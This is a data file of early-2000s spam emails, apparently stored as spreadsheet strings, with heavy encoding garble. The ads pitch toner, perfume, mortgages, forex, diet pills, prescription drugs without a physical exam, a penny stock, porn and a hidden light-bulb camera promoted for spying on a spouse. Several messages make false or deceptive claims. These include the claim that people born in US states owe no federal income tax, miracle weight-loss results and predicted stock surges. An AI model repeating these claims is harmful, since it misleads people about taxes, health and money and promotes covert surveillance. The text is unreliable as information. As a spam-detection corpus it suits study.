    H1 { MARGIN-TOP: 5px; FONT-WEIGHT: bold; FONT-SIZE: 18px; MARGIN-BOTTOM: 2px; FONT-FAMILY: Arial, Helvetica, sans-serif }
	H2 { MARGIN-TOP: 3px; FONT-WEIGHT:bold; FONT-SIZE: 16px; MARGIN-BOTTOM: 2px; FONT-FAMILY: Arial, Helvetica, sans-serif } 
	H3 { MARGIN-TOP: 2px; FONT-WEIGHT: bold; FONT-SIZE: 14px;MARGIN-BOTTOM: 2px; FONT-FAMILY: Arial, Helvetica, sans-serif } 
	TD { FONT-SIZE: 12px; FONT-FAMILY: Arial,Helvetica, sans-serif }
	p { FONT-SIZE: 12px; FONT-FAMILY: Arial, Helvetica, sans-serif } 
	A:hover { COLOR: #ff0000 } 
	A:active { COLOR: #ff0000 } 
   	HR { HEIGHT: 1px }
With Artprice, the world leader in art market information, enhance your
                        website content! 
                        Make the most valuable information on artist available to your customers,
                        and get high commissions!
                    Posez sur votre site la barre de recherche Artprice et bÃ©nÃ©ficiez immÃ©diatement
                    de revenus supplÃ©mentairesÂ…Â (en franÃ§ais) 
Paying right from the moment the link is available to your visitors
                        !
By becoming an Artprice affiliate, each
                                        month you'll get from 20 to 50% in revenue share for all purchases
                                        at www.artprice.com by customers coming from your site.
 Total monthly purchase
 Commission rate
 Monthly revenue share
From USD0 to USD1000 
20%
Up to USD200 
From USD1001 to USD5000
30%
From USD300
                                                to USD1500
From USD5001 to USD15000 40%
From USD2000
                                                to USD6000
Over USD15 001 
 50%
Over USD7500More information on our affiliation program!Â Marketing@artprice.com            Tel : +33 472 421 732 or +33 478 220 000To be removed from our mailing list(In english)
Avec Artprice, le leader mondial de l'information sur le marchÃ©
                        de l'art, enrichissez votre contenu en offrant aux visiteurs de votre
                        site la barre de recherche artistes ArtpriceÂ… ...et bÃ©nÃ©ficiez immÃ©diatement de revenus supplÃ©mentaires comme dÃ©jÃ 
                        des centaines d'autres affiliÃ©s !
Artprice vous reverse tous les mois de 20%
                                        Ã  50% sur les achats effectuÃ©s par les clients venant de votre site
                                        :
 Tranche de CA mensuel HT
 Taux de reversion
 Montant de la reversion mensuelle
Â De 0 Ã  1000 euros
20%
Jusqu'Ã  200 euros
Â De 1001 Ã  5000 euros
30%
De 300 Ã 
                                                1500 euros
Â De 5001 Ã  15000 euros
40%
De 2000
                                                Ã  6000 euros
Â Au dessus de 15 000 euros
 50%
Plus de 7500
                                                eurosPlus d'informations sur notre programme d'affiliation : 
                                    Marketing@artprice.com 
                                TÃ©l : +33 472 421 732 ou +33 478 220 000
Se dÃ©sinscrirehttp://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t>Hi !  Your name was submitted as someone who might be interested in making money at home.  If this is in error, please excuse this email and delete it. This is a one time mailing. "DO NOT REPLY UNLESS YOU WANT MORE EMAILS"!!!If you ARE interested in Making Money At Home, send an email to
giftman@post.com and put "Request Info" in the Subj. line.Thanks and have a nice day.    -------------------------------------------------------------------------------------------
Under Bill s.1618 TITLE III passed by the 105th U.S. Congress this letter is not considered "spam" as long as we include:
1)contact information and,
2)the way to be removed from future mailings (see below).To Remove Yourself From This List: 
Please reply with the email address that you would like removed and the word REMOVE in the subject heading.</t>
  </si>
  <si>
    <t xml:space="preserve">GT TONER
SUPPLIESLaser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supplies.Â Â Â  Order by
phone: (toll free) 1-866-237-7397
Â Â Â  Order by email: Simply reply this message or click hereÂ 
with subject:  ORDER
Â Â Â     Email
removal: Simply reply this message or click here  
Â  with subject:
 REMOVEUniversity   and/orSchool   purchase
orders WELCOME. (no credit approval required)
Pay by check, c.o.d, or purchase order (net 30 days).
WE ACCEPT ALL MAJOR CREDIT CARDS!New! HP 4500/4550 series color
cartridges in stock!  Our cartridge prices are as follows: 
(please order by item number) ItemÂ Â Â Â Â Â Â Â Â Â Â Â Â Â Â 
Hewlett
     PackardÂ Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â 
Price 1 -- 92274A Toner Cartridge for LaserJet 4L, 4ML, 4P, 4MP
------------------------$47.502 -- C4092A Black Toner Cartridge for LaserJet 1100A, ASE, 3200SE-----------------$45.502A - C7115A Toner Cartridge For HP LaserJet 1000, 1200, 3330 ---------------------$55.502B - C7115X High Capacity Toner Cartridge for HP LaserJet 1000, 1200, 3330 -------$65.503 -- 92295A Toner Cartridge for LaserJet II, IID, III, IIID ----------------------$49.504 -- 92275A Toner Cartridge for LaserJet IIP, IIP+, IIIP -------------------------$55.505 -- C3903A Toner Cartridge for LaserJet 5P, 5MP, 6P, 6Pse, 6MP, 6Pxi ------------$46.506 -- C3909A Toner Cartridge for LaserJet 5Si, 5SiMX, 5Si Copier, 8000 ------------$92.507 -- C4096A Toner Cartridge for LaserJet 2100, 2200DSE, 2200DTN ------------------$72.508 - C4182X UltraPrecise High Capacity Toner Cartridge for LaserJet 8100 Series---$125.509 -- C3906A Toner Cartridge for LaserJet 5L, 5L Xtra, 6Lse, 6L, 6Lxi, 3100se------$42.50 9A - C3906A Toner Cartridge for LaserJet 3100, 3150 ------------------------------$42.5010 - C3900A Black Toner Cartridge for HP LaserJet 4MV, 4V ------------------------$89.5011 - C4127A Black Toner Cartridge for LaserJet 4000SE, 4000N, 4000T, 4000TN ------$76.5011A- C8061A Black Laser Toner for HP LaserJet 4100, 4100N ------------------------$76.5011B- C8061X High Capacity Toner Cartridge for LJ4100, 4100N ----------------------$85.5011C- C4127X High Capacity Black Cartridge for LaserJet 4000SE,4000N,4000T,4000TN
-$84.5012 - 92291A Toner Cartridge for LaserJet IIISi, 4Si, 4SiMX -----------------------$65.5013 - 92298A Toner Cartridge for LaserJet 4, 4 Plus, 4M, 4M Plus, 5, 5se, 5M, 5N
--$46.5014 - C4129X High Capacity Black Toner Cartridge for LaserJet 5000N ---------------$97.5015 - LASERFAX 500, 700 (FX1) -----------------------------------------------------$49.0016 - LASERFAX 5000, 7000 (FX2) ---------------------------------------------------$54.0017 - LASERFAX (FX3) --------------------------------------------------------------$49.0018 - LASERFAX (FX4) --------------------------------------------------------------$49.00 ItemÂ Â Â Â Â Â Â Â Â Â Â 
Hewlett Packard - ColorÂ Â Â Â Â Â Â Â Â Â Â Â Â Â Â 
Â Â 
Price C1 -- C4194a Toner
Cartridge,
Yellow (color lj 4500/4550 series)------------------ $ 89.50
C2 -- C4193a Toner
Cartridge, Magenta (color lj 4500/4550 series)-----------------
$ 89.50
C3 -- C4192a toner cartridge, cyan (color lj 4500/4550 series)-------------------- $
89.50
C4 -- c4191a toner cartridge, black (color lj 4500/4550 series)-------------------
$ 74.50 ItemÂ Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â 
LexmarkÂ Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â 
Price 19 - 1380520 High Yield Black Laser Toner for 4019, 4019E, 4028, 4029, 6, 10, 10L -- $109.50
20 - 1382150 High Yield Toner for 3112, 3116, 4039-10+, 4049- Model 12L,16R,
Optra - $109.50
21 - 69G8256 Laser Cartridge for Optra E,
E+, EP, ES, 4026, 4026 (6A,6B,6D,6E)Â  ---- $ 49.00
22 - 13T0101 High Yield Toner Cartridge for Lexmark Optra E310, E312, E312L -------- $ 89.00
23 - 1382625 High-Yield Laser Toner Cartridge for Lexmark Optra S (4059) ----------- $129.50
24 - 12A5745 High Yield Laser Toner for Lexmark Optra T610, 612, 614 (4069) -------- $165.00 ItemÂ Â Â Â Â Â Â Â Â Â Â Â Â Â Â 
EpsonÂ Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â 
Price25
---- S051009 Toner Cartridge for Epson EPL7000, 7500, 8000+ - $115.50
25A --- S051009 LP-3000 PS 7000 -------------------------------- $115.50
26 ---- AS051011 Imaging Cartridge for
ActionLaser-1000, 1500 -- $ 99.50
26A --- AS051011 EPL-5000, EPL-5100, EPL-5200 ------------------ $ 99.50ItemÂ Â Â Â Â Â Â Â Â Â Â 
PanasonicÂ Â Â Â Â Â Â Â Â Â Â Â Â Â Â 
Price
27
------Nec series 2 models 90 and 95 ---------------------- $109.50
ItemÂ Â Â Â Â Â Â Â Â Â Â Â Â Â Â 
Â Â Â Â 
AppleÂ  Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â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$ 85.50ItemÂ Â Â Â Â Â Â Â Â Â Â Â Â Â Â 
CanonÂ Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â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$ 85.50ItemÂ Â 
XeroxÂ Â Â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you.CustomerÂ 
Satisfaction guaranteed
If you are ordering by e-mail or
c.o.d. please fill out an order
form with the following information:Â Â Â 
Â Â Â Â Â Â Â Â 
Â 
phone number
company name
first and last name
street address
city, state zip codeÂ Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â 
Order Now or
call toll free  1-866-237-7397 If you are ordering by purchase order please fill out an order form
with the following information:Â Â Â  Â Â Â Â Â Â Â purchase order number
phone number
company or school name
shipping address and billing address
city, state zip codeÂ Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â 
Order
Now
All trade marks and brand names listed above are property
of the respective
holders and used for descriptive purposes only.--DeathToSpamDeathToSpamDeathToSpam--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</si>
  <si>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top
body
{scrollbar-face-color: #FFFFFF;
scrollbar-highlight-color: #aaaaaa;
scrollbar-3dlight-color: #FFFFFF;
scrollbar-shadow-color: #aaaaaa;
scrollbar-darkshadow-color: #FFFFFF;
scrollbar-track-color: #FFFFFF;
scrollbar-arrow-color: #aaaaaa;
A{COLOR:#000000; text-decoration:none}
A:link {COLOR:#000000; text-decoration:none}
A:active {COLOR:#000000; text-decoration:none}
A:visited {COLOR:#000000;text-decoration:none}
A:hover   { background:#FFFFFF; color:#000000; text-decoration:none; }
b{COLOR:#071945;font-weight:bold}
td { font-size: 9pt;line-height:11pt }
.copyright{font-size:10pt;color:#393939;}
.ment{font-size:9pt;color:#191970}
 ì•ˆë…•í•˜ì„¸ìš”.
ì €í¬ GodSmellì€ ëª…í’ˆí–¥ìˆ˜ë¥¼ ì „ë¬¸ì ìœ¼ë¡œ íŒë§¤í•˜ëŠ” í–¥ìˆ˜ ì „ë¬¸ ì‡¼í•‘ëª°ìž…ë‹ˆë‹¤.
ë°±í™”ì  ê°€ê²©ê³¼ ë¹„êµí•´ë³´ì„¸ìš”!Â 
ê·¸ë¦°í‹° 50ml24,000ì›ìˆ˜ì´ëŸ¬ë¸Œ 30ml32,000ì›ê²”ëž‘ íˆ¬ìœˆì¼€ìžŒ48,000ì›ëž‘ì½¤ ë¯¸ë¼í´ 7ml10,000ì›
Â ë¥´ë¹  ê²ì¡° 30ml22,000ì›í”Œë¼ì›Œ ë°”ì´ ê²ì¡° 4ml10,000ì›ë¯¸ë¼í´ 30ml41,000ì›ì•ˆë‚˜ìˆ˜ì´ 30ml25,000ì›
í›¨ì”¬ ë” ì €ë ´í•˜ì£ ?^^"
ì €í¬ GodSmellì€ ë‹¤ë¥¸ í–¥ìˆ˜ ì‡¼í•‘ëª°ê³¼ëŠ” ë‹¬ë¦¬ ì‹ ìƒí’ˆë„ ë§Žì´ êµ¬ë¹„ë˜ì–´ ìžˆë‹µë‹ˆë‹¤.
Â Â ìš¸íŠ¸ë¼ë°”ì´ì˜¬ë › ì•„ì¿ ì•„í‹± í”Œë¼ìŠ¤í‹±(2002í•œì •) 80ml35,000ì›ë””ì–´ ì—ìŠ¤ì˜ì•„ ì˜´ë¯€ 50ml30,000ì›ë‰´ ëŒ€ë‚˜ë¬´ ê²ì¡° 30ml27,000ì›ë””ì–´ ì—ìŠ¤ì˜ì•„ 30ml27,000ì›
Â ë‹¬ë¦¬ ìŠ¤íƒ€ì¼ 30ml24,000ì›ìž¬ê·œì–´ 40ml30,000ì›ìš¸íŠ¸ë¼ ë°”ì´ì˜¬ë › í¬ë§¨ 50ml30,000ì›ì˜¤ì¼ë¦´ë¦¬ 30ml21,000ì›
ì €í¬ GodSmellì€ ì‚¬ì€í’ˆë„ ì•„ì£¼ í‘¸ì§í•˜ë‹µë‹ˆë‹¤.
ì–´ì„œ ë¹¨ë¦¬ ì‡¼í•‘ì˜ ì¦ê±°ì›€ì„ ë§Œë½í•˜ì„¸ìš”~!^^"
*******ìƒí’ˆì„ í´ë¦­í•˜ì‹œë©´ GodSmellë¡œ ì´ë™í•©ë‹ˆë‹¤!^^"*******Copyright â“’ ê°“ìŠ¤ë©œí–¥ìˆ˜ All Rights Reserved. 019-476-9314
ìƒí˜¸ëª… : GODSMELL   ì‚¬ì—…ìžë“±ë¡ë²ˆí˜¸ : 206-11-48025   ëŒ€í‘œ : í•œê·œì‹ 
ì‚¬ì—…ìž¥ì†Œìž¬ì§€ : ì„œìš¸ì‹œ ì„±ë™êµ¬ í–‰ë‹¹1ë™ 286-23 ì •ìš°ë¹Œë”© 305í˜¸ 
ë³¸ ë©”ì¼ì€ ì •ë³´í†µì‹ ë¶€ ê¶Œê³  ì‚¬í•­ì— ì˜ê±°
ì œëª©ì— [ê´‘ê³ ]ë¼ í‘œì‹œëœ ê´‘ê³  ë©”ì¼ìž…ë‹ˆë‹¤.ìˆ˜ì‹ ê±°ë¶€
ë²„íŠ¼ì„ í´ë¦­í•˜ì‹œë©´ ìˆ˜ì‹ ê±°ë¶€ì²˜ë¦¬ê°€ ì´ë£¨ì–´ ì§‘ë‹ˆë‹¤.The certainly big
help is will become firm belief like this to send the mail to the minutes
when, our services use the transactions the at the electron it
gives.Â Â  To the minutes when it refuses the mail reception the toil
which stands it is but it will grow a reception refusal, when lik it does, it
will eliminate you mail from our data immediately and it will give. the very last on push--DeathToSpamDeathToSpamDeathToSpam--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</si>
  <si>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
Hello,This is a one time mailing. We are looking for people who might be interested in
working P/T from home.  This position involves working
10-15 hours per week.   You can expect to make $15-$25
per hour worked.  To see a job description, you may go tohttp://begintodaystarttomorrow.S5.com.comHave a great day!--DeathToSpamDeathToSpamDeathToSpam--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</si>
  <si>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New Web Technology
Mortgage Rates Slashed For 
      The Last Time!Let us help you get a new mortgage for up to 
      100% of your homeÃ¿FFFF92s valueLower your monthly payment! 
            Consolidate your debt! 
            Shorten the term of your loan! 
            Reduce your interest rate! 
National Average Mortgage 
      Rates Program
Rates30 Yr Fixed
6.50%15 Yr Fixed
6.25%1 Yr Arm
5.51%
Choose From Hundreds of 
            Loan Programs Like: Purchase Loans 
            Refinance 
            Debt Consolidation 
            Home Improvement 
            Interest Only Jumbo's 
            No Income Verification 
Fill Out This Simple 
            Form and We Will Compete For Your Business... 
Required Input Field*Name*
Address
City 
State*
Zip Code *
Buiness Phone*
Home Phone 
Best time to contact
  Morning Afternoon EveningTotal Loan Request 
Approx. Home Value 
A consultant will contact you soon. 
        All information given 
            herein is strictly confidential and will not be re-distributed for 
            any reason other than for the specific use 
            intended.To be 
            removed from our distribution lists, please Click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</si>
  <si>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Hi: Have 
  you been paying too much for your home or
  business long distance?
Have 
  you been looking for an affordable but honest
  long distance alternative?
We are offering 
  Fiber optic Long distance for
  as low as $9.95 per month!
Email 
  us with your phone number and we'll call you
  back so you can hear how great the connection is.  Six plans to choose from including a travel plan. There are no credit checks and because you don't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we'll
  call you back to confirm our crisp clear connection.  To be removed: click here9954ceKz6-102mjlg8918qBcR4-723lUuX3399cRNs0-338xWys4979yobM4-873gAkQ5719cl69--DeathToSpamDeathToSpamDeathToSpam--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</si>
  <si>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Industrial LINUX News: The June issue of the ISA's InTech Magazine has an interesting article on how truly open Linux applications can lower development cost and increase the performance and reliability of industrial automation. A copy of the the article can be found at:  http://www.sixnet-io.com/html_files/web_articles/linux_article_info.htm
This Linux news update brought to you by:  www.Linux4oems.info ------------------------------------------------------------------------------If you don't want to receive future Linux news updates, please reply to this e-mail with the subject "unsubscribe".  You may also unsubscribe or resolve subscription difficulties by calling SIXNET at 518-877-5173 or e-mailing:  linuxnews@sixnet-io.com
.naorwnwbxbsttgvelamusbs
</t>
  </si>
  <si>
    <t xml:space="preserve">Long time no chat!How have you been? If you've been like me, you've been trying
trying almost EVERYTHING to lose weight.Â  I know how you feel
- the special diets, miracle pills, and fancy exercise 
equipment never helped me lose the pounds I needed to lose
either.Â  It seemed like the harder I worked at it, the less
weight I lost - until I heard about 'Extreme Power Plus'.You're probably thinking to yourself, "Oh geez, not another
miracle diet pill!"Â  Like you, I was skeptical at first, but 
my sister said it helped her lose 23 pounds in just 2 weeks, 
so I told her I'd give it a try.Â  I mean, there was nothing 
to lose except a lot of weight!Â  Let me tell you, it was
the best decision I've ever made.  PERIOD.  Six months later,
as I'm writing this message to you, I've gone from 355 pounds
to 210 pounds, and I haven't changed my exercise routine or diet
at all.Â  Yes, I still eat pizza, and lots of it!I was so happy with the results that I contacted the manufacturer
and received permission to resell it - at a HUGE discount.Â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day.Â  
Just try it for one month - there's pounds to lose and confidence 
to gain!Â  You will lose weight fast - GUARANTEED.Â  This is my
pledge to you.BONUS! Order NOW &amp; get FREE SHIPPING on 3 bottles or more!Â  To order Extreme Power Plus on our secure server, just click
on this link -&gt; http://www.2002dietspecials.com/To see what some of our customers have said about this product, 
visit http://www.2002dietspecials.com/testimonials.shtmlTo see a list of ingredients and for more information
on test studies and how it will help you lose weight, visit 
http://www.2002dietspecials.com/ingre1.shtml**************************************************************
If you feel that you have received this email in error, please 
send an email to "print2@btamail.net.cn" requesting to be 
removed. Thank you, and we apologize for any inconvenience.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</si>
  <si>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Get a FREE CAR or SUV!
CLICK HERE!
There are hundreds of companies giving away FREE CARS!
Chevy Blazer
Dodge Durango
Ford Windstar
Honda Civic And More...!
CLICK HERE!We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t>
  </si>
  <si>
    <t xml:space="preserve">
Edrugsource.com
We offer the Absolute Lowest prices on Viagra and other 
FDA-approved medications.
Medication prescribed by licensed U.S. Physicians and 
shipped via overnight delivery. 
Free Medical Consultation Available 24 hours... 7 Days a 
week! 
No Physical Exam Necessary. 
Featured Products Available for immediate delivery at 
Edrugsource.comÂ include:Viagra 
Phentermine 
Celebrex 
Xenical 
Plus Much More! 
Weight Loss - Sexual 
Health - Skin Care - Pain Relief- Stop Smoking Visit  Edrugsource.com for a discrete, safe and secure 
experience.
CLICK HERE 
to see what we have!!!To be excluded from our mailing 
list, 
CLICK HERE  .  You will then be automatically deleted from future mailings.=============================================================================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</si>
  <si>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SAY GOODBYE 
TO Dropped calls Forever!
New Technological Breakthrough
 for Cell Phones, Pcs Phones and Cordless Phones!
Special Members Only Deal!!
Â  They Will Sell Out Fast!!! Click Here Now And end dropped calls FOREVER! CLick Here To Unsubscribe From Our Mailing Listqdaaobwe--DeathToSpamDeathToSpamDeathToSpam--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</si>
  <si>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Nippon Forex Info Mail	TD {
	font-family : Verdana;
	font-size : xx-small;
	font-style : normal;
}
A:link{color: #000000; text-decoration: underline}
A:active{color: #798675; text-decoration: none}
A:visited{color: #798675; text-decoration: underline}
A:hover{color: red; text-decoration: none}
div,p,td,select{font-family: Verdana, Arial, Tahoma, MS Sans Serif; color: black; font-size: 11px}
.intro {
	FONT-FAMILY: Verdana, Arial, Tahoma, MS Sans Serif; FONT-SIZE: 11px; FONT-WEIGHT: normal; LINE-HEIGHT: normal; COLOR: black
}
form{margin-top: 0px; margin-bottom: 0px}
input{margin-bottom: 0px}
ol,ul{font-family: Verdana, Arial, Tahoma, MS Sans Serif; color: black; font-size: 11px; margin-top: 0px}
pre{font-family: courier new, courier, serif; color: black; font-size: 12px}
sup{font-size: 80%; margin-top: 0px}
.title {
	FONT-FAMILY: Verdana, Arial, Tahoma, MS Sans Serif; FONT-SIZE: 10pt; FONT-WEIGHT: bold; LINE-HEIGHT: normal;  COLOR: #7f7f7f
}
.prodtitle {
	FONT-FAMILY: Eurostyle, Arial, Helvetica, sans-serif; FONT-SIZE: 12pt; FONT-WEIGHT: bold; LINE-HEIGHT: normal; COLOR: #7f7f7f
}
.intro4 {
	FONT-FAMILY: Verdana, Arial, Tahoma, MS Sans Serif; FONT-SIZE: 10px; FONT-WEIGHT: normal; LINE-HEIGHT: normal; COLOR: #215EB5
}
.white {
	FONT-FAMILY: Verdana, Arial, Tahoma, MS Sans Serif; FONT-SIZE: 10px; FONT-WEIGHT: normal; LINE-HEIGHT: normal; COLOR: #FFFFFF
}
.yellow {
	FONT-FAMILY: Verdana, Arial, Tahoma, MS Sans Serif; FONT-SIZE: 10px; FONT-WEIGHT: normal; LINE-HEIGHT: normal; COLOR: #ffff00
}
.black {
	FONT-FAMILY: Verdana, Arial, Tahoma, MS Sans Serif; FONT-SIZE: 10.5px; FONT-WEIGHT: normal; LINE-HEIGHT: normal; COLOR: #000000
}
.navlink{line-height: 20px; font-weight:bold; text-decoration: none; text-transform: capitalize}
A.navlink:link{text-decoration: none}
A.navlink:active{text-decoration: none}
A.navlink:visited{text-decoration: none}
A.navlink:hover{text-decoration: none}.product{font-weight:bold; text-decoration: none}
A.product:link{text-decoration: none}
A.product:active{text-decoration: none}
A.product:visited{text-decoration: none}
A.product:hover{text-decoration: none}
H2 {
	FONT-FAMILY: Eurostyle, Arial, Helvetica, sans-serif; FONT-SIZE: 8pt; FONT-WEIGHT: normal; LINE-HEIGHT: normal
}
.internalonly{background-color: yellow}
A.internalonly:link{color: #566B99; background-color: yellow; font-size: 12px; text-decoration: underline}
A.internalonly:active{color: silver; background-color: yellow; font-size: 12px; text-decoration: none}
A.internalonly:visited{color: #666666; background-color: yellow; font-size: 12px; text-decoration: underline}
A.internalonly:hover{color: #333333; background-color: yellow; font-size: 12px; text-decoration: none}To stop receiving Nippon Forex Info news, click on the following link. . We are beginning to realize that with the advancement in technology, increased phone services, computers, fax machines, email and high-speed Internet, we do not need to be in an office environment in order to access the marketplace.There is  GREAT MONEY to be made right from the comfort of our HOMES. There is no greater natural attraction for international engagement in investmentsthan in the worldÂ’s largest and most efficient market Â– Foreign Exchange Market (Forex). It doesnÂ’t matter whether you have any trading experience or not. You can participate in the largest market today and make a GOOD LIVING.  Nippon Forex ( www.nipponforex.com) provides full service trading in the Forex  Market,includes commission free on-line trading, free charts, news and analysis,4 pips spread (!!!)
Innovative Micro Account. Designed to accommodate traders who wish to risk smaller amounts with the same automatic execution of their orders as in the other accounts.
FREE state of the art Â“N-ForexÂ”  software  
download it now and see for yourself how easy it is to use.
FREE demo Account 
with real-time prices, free charts and technical analysis tools. 
 Learn the secrets of successful trading. FREE Forex Online Manual  offers the best answers to typical questions such as why you should trade currencies, who the players are, how you can forecast currency behavior and much more!  You have nothing to lose, so give try it and start 
making your life better, easier and a lot more fun! For additional questions feel free to contact us at info@nipponforex.com. This email is sent in compliance with strict anti-abuse and No SPAM regulations. Thank you for your time. Best regards,
senior project manager
John Bern
E-mail: info@nipponforex.com 
Website: www.nipponforex.com
Â©Copyright 2002 Nippon Forex. All rights reserved.
This email is sent in compliance with strict anti-abuse and No SPAM regulations. 
To stop receiving email from Nippon Forex click on 
this link--DeathToSpamDeathToSpamDeathToSpam--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</si>
  <si>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karen</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</si>
  <si>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srdjan_lidija
</t>
  </si>
  <si>
    <t xml:space="preserve">
A:link {
    TEXT-DECORATION: none
}
A:active {
    TEXT-DECORATION: none
}
A:visited {
    TEXT-DECORATION: none
}
A:hover {
    COLOR: #0033ff; TEXT-DECORATION: underline
}
                                 For 
                                       Immediate ReleaseCal-Bay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25 cents 
      and should skyrocket to $2.66 - $3.25 a share in the near future. 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Research.RAPIDLY GROWING INDUSTRYÂ Industry revenues exceed $900 million, estimates indicate that there 
      could be as much as $25 billion from "smell technology" by the end of 
      2003.!!!!! CONGRATULATIONS 
      !!!!!Our last recommendation to buyÂ ORBT at 
      $1.29Â ralliedÂ and is holding steady atÂ $4.51!Â  
      Congratulations to all our subscribers that took advantage of this 
      recommendation.
ALL removes HONERED. Please allow 7 
      days to be removed and send ALL address to:
NoMore@btamail.net.cnÂ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</si>
  <si>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100% Free Porn!
What more can you ask for?
CLICK HERE
Â 
Â 
Â 
REMOVAL INSTRUCTIONS: We strive to never send unsolicited mail.
However, if you'd rather not receive future e-mails from us,
CLICK HERE to send email and add the word REMOVE in the subject line.
Please allow 48 hours for processing. [(^(PO1:KJ)_8J7BJK9^":}H&amp;*TG0BK5NKIYs5]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</si>
  <si>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Dear Friend,
Â 
"Serving the Tribes While Sharing the Culture"... Has been the mission for the American Indian Heritage Foundation for the past 29 years.
Â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Â 
This worthwhile endeavor is entirely funded by very generous people like you who want to help and make a difference. We need your help NOW more than ever.
Â 
 Click Here To learn more... maybe YOU can help. 
Â 
"May You Always Walk In Beauty"
Pale Moon
Â 
Â 
Â 
We appologize if this message has been an inconvenience. You may comment to our webmaster. 
</t>
  </si>
  <si>
    <t xml:space="preserve">Digital Authoring Tools - Free Software Alert!
FREE SOFTWARE! 
 LIMITED TIME OFFER!*
FREE DOWNLOADMORE INFOSAMPLESUNSUBSCRIBE
DOWNLOAD 1
DOWNLOAD 2
MIRROR site 1
MIRROR site 2
SAMPLES site 1
SAMPLES site 2
UnSubscribe 1
UnSubscribe 2
Digital Authoring Tools 
offers FREE software that can help you CREATE PROFESSIONAL, 3D page-turning and slide-show 
style digital brochures, documents, books, catalogs, invitations, photo albums, resumes, newsletters, 
menus, email promotions, magazines, presentations and more!For more info, samples or a free download, click the appropriate link above! Â 
Server demand is extremely high for this limited time free software offer. Please try these 
links periodically if a site seems slow or unreachable.Copyright Â© 2002 - Affiliate ID #1269
*FREE Version is FULLY FUNCTIONAL with NO EXPIRATION and has a 4 page (2 page spread) limit.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</si>
  <si>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You only THINK  you're a
U.S. citizen!!If you were born in Washington D.C., Puerto Rico,
Guam, the Virgin Islands or some other U.S.
possession; you're right and I'm wrong.
BUT - - If you were born in one of the 50 united
States of America, you ARE NOT a U.S. 
citizen.Rather, you are a Citizen  of Idaho, Ohio, Maine,
etc.; the state of the Union in which you were
BORN!This simple reality holds serious benefits for you!Since you ARE NOT a "federal" citizen, you 
owe
NO federal income taxes.  The IRS
can only demand
income tax payments from 3 kinds of citizens:1. Those who are citizens of the U.S.!
2. Anyone who receives "income" from a U.S.
source
(and wait until you find out what "income" really
is!).
3. Any Citizen of one of the 50 united States of America
who VOLUNTEERS to pay it!Believe it or not, - - When you sign an IRS W4 form for
your "employer" you have entered into a "hidden"
contract and have VOLUNTEERED to pay!Our web site is FILLED with educational and
eye
opening information on how you've been tricked
into
this - AND how  you can free yourself from the
treachery.For ONLY ONE MORE e-mail to point you to our web site:
Reply with "Citizen" in the subject box.
Click HerePS: To be removed from the list, just put 
"Remove" in subject line.
Click Here
0489xPJK9-7l10--DeathToSpamDeathToSpamDeathToSpam--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</si>
  <si>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Hello, [!To!]Human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 Click HereOR 
  Here  You are receiving this email as a subscriber
  to the Opt-In America Mailing List. 
To remove yourself from all related maillists,just Click 
Herehttp://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">
Web Letter
&lt;!--
body
{
background-image:
url(http://www.sancristobalsa.net/letter/images/bg.gif);
background-repeat: repeat-y;
background-position: top left
}
//--&gt;
Tremendous Investment Opportunity!
Are you are fed up with the manipulation and erratic performance of the stock market?Â  Like most people, are you looking for a stable investment that can provide a 25%-35% tax-free annual cash flow return?Â  If you answered yes to either question, I have an exciting offering for you.
I represent a company that has a limited offering of emerging growth Caribbean Real Estate that enjoins a tropical working farm, which provides substantial cash flow, long-term wealth accumulation, and the proven appreciation of Caribbean real estate.
Here are the details:Â Â A 20-acre tract of waterfront Caribbean real estate is only $106,000 (including closing costs and dual residency status in a tax-advantaged country).
Â Â The investment will be totally private and protected from lawsuits.
Â Â The plantation has a proven track record.
Â Â Total turnkey system is provided - You buy the real estate. The Management Company plants, maintains, and harvests your crop.Â  You deposit the quarterly cash returns.We currently have several tracts of Phase II remaining and it is premier property that is planned to overlook the natural marina of an eco resort. There is incredible demand for these tracts and I wanted to give you the first opportunity to participate in this exciting and lucrative project.
Please review the online PowerPoint presentation and I can put you in touch with the principals of the project to answer any questions that you have. Click Here to View Presentation
Please contact me, as soon as possible, so you don't miss out on this offering.
Sincerely yours,
Corporate Real Property MagazineMaster BrokerSan Cristobal Land Developmenthttp://www.sancristobalsa.net/index.php?siteID=tom@realpropertymagazine.com
PS.Â  If Huge Returns, Rapid Cash Flow, and the Security of Titled Real Estate interest you, contact me, today!Telephone: 011-507 226-2675Fax: 011-507 226-5884E-mail:Â tom@realpropertymagazine.com
Please fill in the form below to request more information:
Name: Â 
Phone: Â 
E-mail: Â 
Â 
Â Â 
To be removed reply with "remove" in the subject line.  Thank you!--DeathToSpamDeathToSpamDeathToSpam--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</si>
  <si>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Look this is so hot that not only do you want one... but you can get rich selling it to others... some will use it for good and many will use it for bad... either way the unit works...It is a bulb... but it is not a bulb... it is a secret wireless camera use professionally by cia, fbi and others... original cost was over $5000 but because someone went to china to knock them off you now can buy it today for $299 each, or 2 for $499 or 10 for $1750... do the math... you can earn $125 per unit or more and sell 10 in a week... all people need to do is see one and they flip out...Here is how it worksYou screw it into any lamp, wall  or ceiling bulb socet (even over the shower) it could be in a dark place it don't matter... put it in your bedroom and make sure your wife does not have company while you are working... i am telling you man you would pay $1000's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$299 you can charge $499 and make $325 follow the rest of the information and check it out....Special Sale thru July 31st, 2002               http://www.easy-signup.com/sv4/ Why am I receiving this email?  Because you or someone using this email address has opted to receive New Product information from Internet-Hitz or one of its entrusted partners..Thank you for your patronage.
If this is an error please send an email to be removed.
in the subject line type: Remove Me List-1046-78x
mail to meoffnow2Kb@yahoo.com--DeathToSpamDeathToSpamDeathToSpam--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</si>
  <si>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JetMp3 Tï¿½rkiye'de ilk kez uygulanan bir sistemi hayata geï¿½irdi.
http://www.jetmp3.com
